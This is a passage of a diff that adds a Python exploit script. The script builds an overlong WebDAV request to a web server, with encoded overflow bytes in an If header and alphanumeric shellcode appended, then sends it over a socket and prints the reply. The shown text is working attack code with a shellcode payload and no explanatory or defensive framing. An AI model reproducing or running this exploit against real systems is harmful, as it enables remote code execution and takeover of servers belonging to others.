b3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
+pay+='>'
+pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
+pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
+
+shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
+
+pay+=shellcode
+pay+='>\r\n\r\n'
+print pay
+
+sock.send(pay)  
+data = sock.recv(80960)  
+
+print data 
+sock.close
\ No newline at end of file